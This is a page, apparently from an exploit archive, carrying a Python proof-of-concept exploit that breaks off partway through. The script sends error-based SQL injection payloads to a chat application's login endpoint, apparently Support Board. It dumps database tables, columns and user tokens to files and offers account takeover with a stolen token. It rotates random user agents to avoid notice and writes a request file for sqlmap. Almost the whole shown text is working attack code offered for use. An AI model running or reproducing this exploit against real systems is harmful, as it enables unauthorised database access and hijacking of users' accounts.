4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
try:
    import requests
    import time
    import sys
    import socket
    import base64
    import platform
    import os
    import webbrowser
    import random
    from colorama import init, Fore
except ImportError:
    print("""
Please install the Required Modules using

pip3 install [Module Name]
    """)

init()

red = Fore.RED
green = Fore.GREEN
blue = Fore.BLUE
magenta = Fore.MAGENTA
white = Fore.WHITE
reset = Fore.RESET

def clear():
    if platform.system() == "Windows":
        os.system("cls")
    else:
        os.system("clear")

class exploit:
    def __init__(self):
        self.cookies = { "sb-updates": "3.3.4" }
        self.user_agents = ['Mozilla/5.0 (Linux; Android 5.1; AFTS Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/41.99900.2250.0242 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4',
'Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.58',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2',
'Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2',
'Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0',
'Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (Windows NT 6.1; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16',
'Mozilla/5.0 (Windows; Windows NT 6.1; rv:2.0b2) Gecko/20100720 Firefox/4.0b2',
'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',
'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:12.0) Gecko/20100101 Firefox/12.0',
'Mozilla/5.0 (X11; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/63.0.3239.84 Chrome/63.0.3239.84 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6 GTB7.1',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080214 Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.5) Gecko/20060819 Firefox/1.5.0.5',
'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5',
'Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12',
'Mozilla/5.0 (X11; Ubuntu; Linux armv7l; rv:17.0) Gecko/20100101 Firefox/17.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Mozilla/5.0 (iPad; CPU OS 11_2_1 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C153 Safari/604.1']
        self.database = []
        self.tables = []
        self.columns = []
        self.tokens = []
        self.divider = "---------------------"
        
    def save(self):
        new_file = open("content.txt", "w")
        new_file.write("Tables Found on The Database\n")
        for i in range(len(self.tables)):
            new_file.write(self.tables[i]+ "\n")
        new_file.write("\n\n Columns In the Table")
        new_file.write(self.divider+"\n")
        new_file.write(self.tables[0]+'\n')
        new_file.write(self.divider+"\n")
        for i in range(len(self.columns)):
            new_file.write(self.columns[i]+ "\n")
        new_file.close()

    def get_tables(self, url):
        print("\n"+ blue + self.divider + "\n" + red + "DUMPING TABLES" + "\n" + blue + self.divider)
        i = 0
        while True:
            headers = {
                "User-Agent": random.choice(self.user_agents),
            }
            data = {
                "function": "login", 
                "email": "test\" AND GTID_SUBSET(CONCAT((select table_name from information_schema.tables where table_schema=database() LIMIT {0},1),(SELECT (ELT(9164=9164,0x00))),0x00),9164)-- #".format(i), 
                "password": "test", 
                "login-cookie": '', 
                "language": "false"
            }
            response = requests.post(url, headers=headers, cookies=self.cookies, data=data)
            response = response.text
            response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
            response = response.replace('[', '')
            response = response.replace(']', '')
            response = response.replace("'", '')
            response = response.replace('"', '')
            response = response.replace('.', '')
            response = response.replace(' ', '')
            print(magenta + response)
            self.tables.append(response)
            i += 1
            if "success,false" in response:
                self.tables.pop()
                break
        print("Tables Found "+ white + str(self.tables))

    def get_columns(self,url):
        lines = 0
        c = 1
        i = 0
        print("\n"+ blue + self.divider + "\n" + red + self.tables[0] + "\n" + blue +  self.divider)
        while lines < len(self.tables):
            while True:
                headers = {
                    "User-Agent": random.choice(self.user_agents),
                }
                data = {
                    "function": "login",
                    "email": "test\" AND GTID_SUBSET(CONCAT((select column_name from information_schema.columns where table_schema=database() LIMIT {0},1),(SELECT (ELT(9164=9164,0x00))),0x00),9164)-- #".format(i), 
                    "password": "test", 
                    "login-cookie": '', 
                    "language": "false"
                }
                response = requests.post(url, headers=headers, cookies=self.cookies, data=data)
                response = response.text
                response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
                response = response.replace('[', '')
                response = response.replace(']', '')
                response = response.replace("'", '')
                response = response.replace('"', '')
                response = response.replace('.', '')
                response = response.replace(' ', '')
                self.columns.append(response)
                i += 1
                if response == "id":
                    self.columns.append(self.divider)
                    self.columns.append(self.tables[c])
                    self.columns.append(self.divider)
                    print("\n"+ blue + self.divider + "\n" + red + self.tables[c] + "\n" + blue + self.divider)
                    c = c + 1
                    lines = lines + 1
                if "success,false" in response:
                    self.self.columns.pop()
                    break
                print(magenta + response)
            break
    def get_tokens(self,url, path):
        final_path = path.replace("admin.php", "include/ajax.php")
        final_url = "{0}{1}".format(url,final_path)
        print("\n"+ blue + self.divider + "\n" + red + "Dumping Tokens For Account TakeOver" + "\n" + blue +  self.divider)
        i = 0
        for i in range(0,1):
            headers = {
                "User-Agent": random.choice(self.user_agents),
            }
            data = {
                "function": "login",
                "email": "test\" AND GTID_SUBSET(CONCAT(0x746573747465737474657374,(SELECT (ELT(3469=3469,0x74657374))),database()),3469)-- jXft".format(i), 
                "password": "test", 
                "login-cookie": '', 
                "language": "false"
            }
            response = requests.post(final_url, headers=headers ,cookies=self.cookies, data=data)
            response = response.text
            response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
            response = response.replace('testtesttesttest', '')
            response = response.replace('[', '')
            response = response.replace(']', '')
            response = response.replace("'", '')
            response = response.replace('"', '')
            response = response.replace('.', '')
            response = response.replace(' ', '')
            self.database.append(response)
        while True:
            headers = {
                "User-Agent": random.choice(self.user_agents),
            }
            data = {
                "function": "login",
                "email": 'test\" AND GTID_SUBSET(CONCAT(0x546f6b656e3a2020 ,(SELECT MID((IFNULL(CAST(token AS NCHAR),0x00)),1,190) FROM {0}.sb_users ORDER BY token LIMIT {1},1),0x20),7838)-- #'.format(self.database[0], i), 
                "password": "test", 
                "login-cookie": '', 
                "language": "false"
            }
            response = requests.post(final_url, headers=headers, cookies=self.cookies, data=data)
            response = response.text
            response = response.replace('"error","db-error","sb_db_get","Malformed GTID set specification','')
            response = response.replace('[', '')
            response = response.replace(']', '')
            response = response.replace("'", '')
            response = response.replace('"', '')
            response = response.replace('.', '')
            response = response.replace(' ', '')
            self.tokens.append(response)
            i += 1
            if "success,false" in response:
                self.tokens.pop()
                break
            print(blue + response)
        print(red + "\nSaving the Tokens into File")
        print(red + "Tokens Saved Into tokens.txt\n")
        new_file = open("tokens.txt", "w")
        new_file.write(self.divider + "\n")
        new_file.write("Tokens Found on The Database\n")
        new_file.write(self.divider + "\n")
        for i in range(len(self.tokens)):
            new_file.write(self.tokens[i]+ "\n")
        new_file.close()
        yes_or_no = str(input(blue + "Do you want to takeover now (Y, N): " + white))
        if yes_or_no in ['yes', "Yes", "YES", "y", "Y"]:
            token_take_over = str(input("Enter the token: "))
            take_over_get(url, path, token_take_over)
        else:
            sys.exit(0)

"""Generate XML FILE For SQL Injection"""
def manual(url, temp_admin, temp_ajax):
    if "https://" in url:
        port = 443
        protocol = "https"
    if "http://" in url:
        port = 80
        protocol = "http"

    post_url = "{0}{1}".format(url, temp_ajax)
    sanitize_origin = url
    sanitize_origin = sanitize_origin.replace("http://", '')
    sanitize_origin = sanitize_origin.replace("https://", '')
    sanitize_origin = sanitize_origin.replace(" ", '')
    # GET IP OF URL
    ip = socket.gethostbyname('{0}'.format(sanitize_origin))

    # REQUEST
    data_request="""POST {0} HTTP/1.1
Host: {1}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 68
X-Requested-With: XMLHttpRequest
Origin: {2}
Referer: {3}{4}
Connection: close
Cookie: sb-updates=3.3.4

function=login&email=test&password=test&login-cookie=&language=false""".format(temp_ajax, sanitize_origin, url, url, temp_admin)
    # base64 encode the request
    data_bytes = data_request.encode('utf-8')
    b64_bytes_request = base64.b64encode(data_bytes)
    b64_string_request = b64_bytes_request.decode('utf-8')
    # RESPONSE
    response_cookies = {
        "sb-updates": "3.3.4"
    }
    response_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", 
        "Accept": "*/*", 
        "Accept-Language": "en-US,en;q=0.5", 
        "Accept-Encoding": "gzip, deflate", 
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 
        "X-Requested-With": "XMLHttpRequest", 
        "Origin": "{0}".format(url), 
        "Referer": "{0}{1}".format(url,temp_admin), 
        "Connection": "close"
    }
    response_data = {
        "function": "login", 
        "email": "test", 
        "password": "test", 
        "login-cookie": '', 
        "language": "false"
    }
    response = requests.post(post_url, headers=response_headers, cookies=response_cookies, data=response_data)
    # Output header information and response
    var = "HTTP/1.1 200 OK\n"
    for key, value in response.headers.items():
        var += key + ':' +value+ '\n'
    var += '\n'
    var += response.text

    # base 64 encode the response
    response_bytes = var.encode('utf-8')
    b64_bytes_response = base64.b64encode(response_bytes)
    b64_string_response = b64_bytes_response.decode('utf-8')

    # Input in xml file ready for sqlmap
    f = open('request.xml', 'w')
    f.write(
        """<?xml version="1.0"?>
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="2021.2.1" exportTime="{0}">
  <item>
    <time>{1}</time>
    <url><![CDATA[{2}]]></url>
